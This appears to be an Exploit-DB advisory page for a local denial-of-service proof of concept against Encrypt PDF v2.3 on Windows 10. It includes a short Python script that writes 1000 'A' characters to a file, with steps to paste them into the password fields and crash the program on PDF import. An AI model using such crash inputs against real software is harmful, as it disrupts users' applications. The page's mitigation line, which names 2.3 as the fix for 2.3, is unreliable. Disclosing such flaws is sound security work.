Encrypt PDF v2.3 - Denial of Service (PoC)

vendor:

Encrypt PDF

by:

Alejandra Sánchez

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Encrypt PDF

Affected Version From: 2.3

Affected Version To: 2.3

Patch Exists: Yes

Related CWE: N/A

CPE: a:verypdf:encrypt_pdf:2.3

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10

2019

Encrypt PDF v2.3 – Denial of Service (PoC)

Encrypt PDF v2.3 is vulnerable to a denial of service attack when a maliciously crafted file is imported. The attack can be triggered by copying a string of 1000 'A' characters to the clipboard and pasting it into the 'User Password' or 'Master Password' fields in the 'Settings' menu. When a PDF file is imported, the application will crash.

Mitigation:

Update to the latest version of Encrypt PDF v2.3 or later.

Source

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: Encrypt PDF v2.3 - Denial of Service (PoC)
# Date: 19/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.verypdf.com
# Software: http://www.verypdf.com/encryptpdf/encryptpdf.exe
# Version: 2.3
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "EncryptPDF.py", it will create a new file "EncryptPDF.txt"
# 2.- Copy the text from the generated EncryptPDF.txt file to clipboard
# 3.- Open Encrypt PDF v2.3
# 4.- Go to 'Setting', paste clipboard in the field 'User Password' or the field 'Master Password' and Click 'OK'
# 5.- Click on 'Open PDF(s)', when you import a pdf file, you will see a crash

buffer = "\x41" * 1000

f = open ("EncryptPDF.txt", "w")
f.write(buffer)
f.close()